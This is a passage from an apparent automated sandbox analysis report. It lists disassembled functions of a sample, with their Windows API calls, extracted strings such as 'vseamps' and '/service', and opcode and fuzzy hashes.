                                                      • Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00
                                                      Function 0000000140001520 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastManagerOpen$FileModuleName
                                                      • String ID: /remove$/service$vseamps
                                                      • API String ID: 67513587-3839141145
                                                      • Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                      • Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
                                                      • Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
                                                      • Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704
                                                      Function 000000014000F000 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
                                                      • GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
                                                      • GetProcAddress.KERNEL32 ref: 000000014000F0F3
                                                      • GetProcAddress.KERNEL32 ref: 000000014000F117
                                                        • Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$Load$Library
                                                      • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                      • API String ID: 3981747205-232180764
                                                      • Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                      • Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
                                                      • Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
                                                      • Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210
                                                      Function 00000001400022C0 Relevance: 15.1, APIs: 10, Instructions: 96threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
                                                      • String ID:
                                                      • API String ID: 4284112124-0
                                                      • Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                      • Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
                                                      • Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
                                                      • Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40
                                                      Function 0000000140001430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52serviceCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
                                                      • String ID: vseamps
                                                      • API String ID: 3693165506-3944098904
                                                      • Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                      • Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
                                                      • Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
                                                      • Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00
                                                      Function 0000000140009300 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: FileModuleName
                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                      • API String ID: 514040917-4022980321
                                                      • Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                      • Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
                                                      • Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
                                                      • Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304
                                                      Function 000000014000BB70 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: String$ByteCharMultiWide$AllocErrorHeapLast
                                                      • String ID:
                                                      • API String ID: 2057259594-0
                                                      • Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                      • Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
                                                      • Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
                                                      • Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700
                                                      Function 0000000140005A70 Relevance: 12.2, APIs: 8, Instructions: 163memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Free$AllocInfoStartupVersion
                                                      • String ID:
                                                      • API String ID: 3103264659-0
                                                      • Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                      • Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
                                                      • Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
                                                      • Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741
                                                      Function 00007FF8FF5D2630 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 3140674995-0
                                                      • Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                      • Instruction ID: 4ea9704f24f0ba0f1ec70a2fe03f6a5af2a6423d9a24afefb05b9b45bffa4e10
                                                      • Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
                                                      • Instruction Fuzzy Hash: F4314572A09B818AEB608F60EC407ED7765FB98784F444139DA6E47BD8DF78D648CB10
                                                      Function 0000000140007C91 Relevance: 9.1, APIs: 6, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                      • String ID:
                                                      • API String ID: 1269745586-0
                                                      • Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                      • Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
                                                      • Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
                                                      • Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00
                                                      Function 00007FF8FF5D76E0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 1239891234-0
                                                      • Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                      • Instruction ID: 653ea2b8929e13f606da4b0a60c013e651665f19cb571d19e27d0229b41b9c8f
                                                      • Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
                                                      • Instruction Fuzzy Hash: 05316032A19B818ADB60CF25EC412AE77A0FB98794F540635EAAD43BD9DF7CD145CB00
                                                      Function 000000014000A370 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                      • String ID:
                                                      • API String ID: 1445889803-0
                                                      • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                      • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                                      • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                      • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                                      Function 0000000140004630 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                                      • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcess
                                                      • String ID:
                                                      • API String ID: 1617791916-0
                                                      • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                      • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                                      • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                      • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                                      Function 00000001400106B0 Relevance: 4.5, APIs: 3, Instructions: 47COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled$CaptureContext
                                                      • String ID:
                                                      • API String ID: 2202868296-0
                                                      • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                      • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                                                      • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                      • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                                                      Function 00007FF8FF5E0248 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ExceptionRaise_clrfp
                                                      • String ID:
                                                      • API String ID: 15204871-0
                                                      • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                      • Instruction ID: e7e6f9ce2bdcea37b763abec4cfb23d13ff88d12543ca714b4ff7687d8dcc407
                                                      • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                      • Instruction Fuzzy Hash: C6B13D73604B898FEB15CF29C84636C7BA0F758B88F158A26DB6D877A4CB39D455CB00
                                                      Function 00000001400103D0 Relevance: 3.2, APIs: 2, Instructions: 183COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ByteCharErrorLastMultiWide
                                                      • String ID:
                                                      • API String ID: 203985260-0
                                                      • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                      • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                                                      • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                      • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                                                      Function 0000000140010CF0 Relevance: 3.1, APIs: 2, Instructions: 82COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                      • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                                                      • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                      • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                                                      Function 00007FF8FF5DA1B8 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                      • Instruction ID: e7e405b37517b74b71446d5d28c6a6859f4e6be5f9c8cba57215f80db46f5754
                                                      • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                      • Instruction Fuzzy Hash: DF51C622B0D6819AFB209BB2AC445AE7BA5AB597D4F144235EE7C27AD6DF3CD401C700
                                                      Function 0000000140011270 Relevance: 1.6, APIs: 1, Instructions: 84COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: EntryFunctionLookup
                                                      • String ID:
                                                      • API String ID: 3852435196-0
                                                      • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                      • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                                                      • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                      • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                                                      Function 000000014000DDD9 Relevance: 1.6, Strings: 1, Instructions: 301COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                      • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
